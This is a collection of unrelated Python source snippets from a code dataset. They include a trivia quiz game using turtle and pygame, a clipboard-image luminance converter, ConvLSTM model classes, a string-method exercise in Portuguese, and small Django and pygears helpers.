_feature = Histogram(HISTOGRAM_BINS, config)
elif 'alex' in feature_name:
_feature = AlexNet(config)
elif 'vgg' in feature_name:
_feature = VGGNet(config)
elif 'resnet50' in feature_name:
_feature = ResNet50(config)
elif 'colourization' in feature_name:
_feature = Colourization(config)
elif 'vae' in feature_name:
_feature = VAE(config)
else:
_feature = MyModel(config)
sys.exit()
return _feature
# Feature index creation code entry point called from top level main function
def feature_driver_run():
# Read input JSON
config = feature_json_read()
test_config_dict(config)
# Instantiate feature object
feature_object = feature_object_create(config)
# test_histogram_object(feature_object)
# Apply get_feature() to each image
feature_object.index_create(feature=feature_object)
|
StarcoderdataPython
|
4959380
|
<reponame>heltonricardo/estudo-python
n = input('Digite algo: ')
print('O tipo da entrada é {}'.format(type(n)))
print('É alfanumérico? ', n.isalnum())
print('É alfabético? ', n.isalpha())
print('É decimal? ', n.isdecimal())
print('É dígito? ', n.isdigit())
print('É identificador? ', n.isidentifier())
print('É minúsculo? ', n.islower())
print('É numérico? ', n.isnumeric())
print('É printável? ', n.isprintable())
print('É espaço? ', n.isspace())
print('É título? ', n.istitle())
print('É maiúsculo? ', n.isupper())
|
StarcoderdataPython
|
8042824
|
<reponame>553269487/ConvLSTM-on-TIANCHI-CIKM-2017
from torch import nn
import torch.nn.functional as F
import torch
class activation():
def __init__(self, act_type, negative_slope=0.2, inplace=True):
super().__init__()
self._act_type = act_type
self.negative_slope = negative_slope
self.inplace = inplace
def __call__(self, input):
if self._act_type == 'leaky':
return F.leaky_relu(input, negative_slope=self.negative_slope, inplace=self.inplace)
elif self._act_type == 'relu':
return F.relu(input, inplace=self.inplace)
elif self._act_type == 'sigmoid':
return torch.sigmoid(input)
else:
raise NotImplementedError
class ED(nn.Module):
def __init__(self, encoder, decoder):
super().__init__()
self.encoder = encoder
self.decoder = decoder
def forward(self, input):
state = self.encoder(input) #encode-->hidden state
output = self.decoder(state)#hidden state--》decode
return output
|
StarcoderdataPython
|
4997129
|
<gh_stars>0
#Hangman Trivia!!
#make variables for
#[questions]
#right_answer
#wrong_answers
#bad_pictures
#good_pictures
#name
#
#
#register all graphics and pictures
#ask user to input name
#welcome the user to <NAME>
#do the following 5 times
#ask user question
#show answers
#take answers
#if right
#add 1 good_picture to the drawing
#else
#add 1 bad_picture to the drawing
#if loses more the wins
#print you lose
#else wins more then loses
#print you win
#congratulate if user wins
#dont congratulate if user loses
import pygame
import turtle
pygame.mixer.pre_init(44100, 16, 2, 4096) #frequency, size, channels, buffersize
pygame.init() #turn all of pygame on.
# pictures
turtle.bgcolor("green")
screen = turtle.Screen()
screen.setup(1500, 1000)
turtle.register_shape("car.gif")
turtle.register_shape("cow.gif")
turtle.register_shape("electric car.gif")
turtle.register_shape("factory.gif")
turtle.register_shape("cow-farting.gif")
turtle.register_shape("fire.gif")
turtle.register_shape("flowers.gif")
turtle.register_shape("6 trash images.gif")
turtle.register_shape("recycling factory.gif")
turtle.register_shape("6 sea.gif")
car = turtle.clone ()
car.shape("car.gif")
car.penup()
car.hideturtle()
car.goto(-600, -200)
elec_car = turtle.clone()
elec_car.shape("electric car.gif")
elec_car.penup()
elec_car.hideturtle()
elec_car.goto(-600, -200)
car_s=pygame.mixer.Sound("Car Engine Sound Effect.wav")
cow = turtle.clone()
cow.shape("cow.gif")
cow.penup()
cow.hideturtle()
cow.goto(-300, -200)
cow_s=pygame.mixer.Sound("Moo! Sound Effect [COW].wav")
farting_cow = turtle.clone()
farting_cow.shape("cow-farting.gif")
farting_cow.penup()
farting_cow.hideturtle()
farting_cow.goto(-300, -200)
f_cow_s=pygame.mixer.Sound("Fart sound effect.wav")
factory = turtle.clone()
factory.shape("factory.gif")
factory.penup()
factory.hideturtle()
factory.goto(0, -200)
factory_s=pygame.mixer.Sound("factory.wav")
refactory = turtle.clone()
refactory.shape("recycling factory.gif")
refactory.penup()
refactory.hideturtle()
refactory.goto(0, -200)
fire = turtle.clone()
fire.shape("fire.gif")
fire.penup()
fire.hideturtle()
fire.goto(500, -200)
fire_s=pygame.mixer.Sound("FIRE SOUND EFFECT IN HIGH QUALITY.wav")
flowers = turtle.clone()
flowers.shape("flowers.gif")
flowers.penup()
flowers.hideturtle()
flowers.goto(400, -200)
flowers_s=pygame.mixer.Sound("Bird Sound Effect.wav")
sea = turtle.clone()
sea.shape("6 sea.gif")
sea.penup()
sea.hideturtle()
sea.goto(0, -400)
sea_s=pygame.mixer.Sound("OCEAN SOUND EFFECT [HD].wav")
trash = turtle.clone()
trash.shape("6 trash images.gif")
trash.penup()
trash.hideturtle()
trash.goto(0, -400)
null = turtle.clone()
null.penup()
null.hideturtle()
null.goto(1000,1000)
c_answer_s=pygame.mixer.Sound("Correct-answer.wav")
w_answer_s=pygame.mixer.Sound("Wrong-answer-sound-effect.wav")
# sounds
def car_s_f():
pygame.mixer.Sound.play(car_s)
def cow_s_f():
pygame.mixer.Sound.play(cow_s)
def f_cow_s_f():
pygame.mixer.Sound.play(f_cow_s)
def factory_s_f():
pygame.mixer.Sound.play(factory_s)
def flowers_s_f():
pygame.mixer.Sound.play(flowers_s)
def fire_s_f():
pygame.mixer.Sound.play(fire_s)
def sea_s_f():
pygame.mixer.Sound.play(sea_s)
# what the question has
class Question:
def __init__(self, prompt, answer, turtle_shape, bad_turtle, sound, b_sound):
self.prompt = prompt
self.answer = answer
self.turtle_shape = turtle_shape
self.bad_turtle = bad_turtle
self.sound=sound
self.b_sound=b_sound
def p_g_sound(self):
pygame.mixer.Sound.play(self.sound)
def p_b_sound(self):
pygame.mixer.Sound.play(self.b_sound)
#questions,options of answers, \n = linebreaker
question_prompts = [
"\nwhich country has the most pollution?\n(a) China\n(b) Brazil\n(c) United States\n(d) Indonesia\n",
"\nHow many years of oil is left in the world?\n(a) 101 years\n(b) 53 years\n(c) 20 years\n(d) 69 years\n",
"\nHow much oil is left in the world?\n(a) 6.003 trillion barrels\n(b) 3.775 trillion barrels\n(c) 0.804 trillion barrels\n(d) 1.688 trillion barrels\n",
"\nWho is the biggest oil producer in the world?\n(a) Saudi Arabia\n(b) USA\n(c) Russia\n(d) China\n",
"\nHow many years of gas are left in the world?\n(a)200 years\n(b) 86 years\n(c) 115 years\n(d)98 years\n",
"\nwhat is the easiest plastic code to recycle?\n(a) 3\n(b) 6\n(c) 7\n(d) 1\n",
"\nWhat is cutting of trees called?\n(a) hewing\n(b) cutzing\n(c) CTs\n(d) falling\n",
"\nWhat is the largest oil company in Canada?\n(a)Encana Corporation\(b)Suncor Energy\n(c)Husky Energy\n(d)Enbridge\n",
"\nWhat is the largest oil company in Canada?\n(a)water\n(b)sand\n(c)dust\n(d)stones\n",
"\nWhat is the top cause of air pollution?\n(a)Emission from Vehicles\n(b)Poisonous Gas\n(c)Combustion of Fossil Fuels\n(d)Pollution From AC\n",
#right answers
]
questions = [
Question(question_prompts[0], "a", refactory, factory, factory_s , factory_s),
Question(question_prompts[1], "b", elec_car, car, car_s, car_s),
Question(question_prompts[2], "d", cow, farting_cow, cow_s,f_cow_s),
Question(question_prompts[3], "a", flowers, fire, flowers_s, fire_s),
Question(question_prompts[4], "c", sea, trash,sea_s, sea_s),
Question(question_prompts[5], "d", null, null, c_answer_s, w_answer_s),
Question(question_prompts[6], "a", null, null, c_answer_s, w_answer_s),
Question(question_prompts[7], "b", null, null, c_answer_s, w_answer_s),
Question(question_prompts[8], "c", null, null, c_answer_s, w_answer_s),
Question(question_prompts[9], "b", null, null, c_answer_s, w_answer_s),
]
#loop, if the answer is right or wrong and print the line
def run_quiz(questions):
print("\n")
for question in questions:
answer = input(question.prompt)
if answer == question.answer:
print("the answer is correct!")
question.turtle_shape.showturtle()
pygame.mixer.music.stop()
question.p_g_sound()
else:
print("the answer is incorrect..")
print("the right answer is " + question.answer)
question.bad_turtle.showturtle()
pygame.mixer.music.stop()
question.p_b_sound()
run_quiz(questions)
|
StarcoderdataPython
|
3200371
|
from selia.views.create_views.manager_base import CreateManagerBase
class CreatePhysicalDeviceManager(CreateManagerBase):
manager_name = 'selia:create_physical_device'
def view_from_request(self):
if 'device' not in self.request.GET:
return 'selia:create_physical_device_select_device'
return 'selia:create_physical_device_create_form'
|
StarcoderdataPython
|
3558290
|
<reponame>kdr-s/clipboard-img-to-Y<filename>clipboard-img-to-Y.py
from PIL import ImageGrab, ImageChops, Image
from time import sleep
from ctypes import windll
import numpy as np
last_im = Image.new("RGB", (512, 512), (128, 128, 128))
Ctrl = 0x11
def isPressed(key):
return(bool(windll.user32.GetAsyncKeyState(key)&0x8000))
while True:
im = ImageGrab.grabclipboard()
if isinstance(im, Image.Image):
im = im.convert('RGB')
# 2つの画像の同一かどうか
if ImageChops.difference(im, last_im).getbbox() != None:
last_im = im
if isPressed(Ctrl):
# lumi_im = im.convert("L")
array = np.asarray(im, dtype='float')
array = (array/255)**2.2
# array = array[:][:][0]*0.2126; array = array[:][:][1]*0.7152; array = array[:][:][2]*0.0722;
array = np.sum(array*np.array([[[0.2126,0.7152,0.0722]]]), axis=2)
array = (array**(1/2.2))*255
array = np.round(array).astype('uint8')
lumi_im = Image.fromarray(array)
lumi_im.show()
sleep(1)
|
StarcoderdataPython
|
8150249
|
from pygears.core.hier_node import HierVisitorBase
class HDLGearHierVisitor(HierVisitorBase):
def RTLGear(self, node):
gear = node.gear
if hasattr(self, gear.definition.__name__):
return getattr(self, gear.definition.__name__)(node)
def flow_visitor(cls):
def svgen_action(top, conf):
v = cls()
v.conf = conf
v.visit(top)
return top
return svgen_action
def is_gear_instance(node, definition):
return node.gear.definition is definition
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.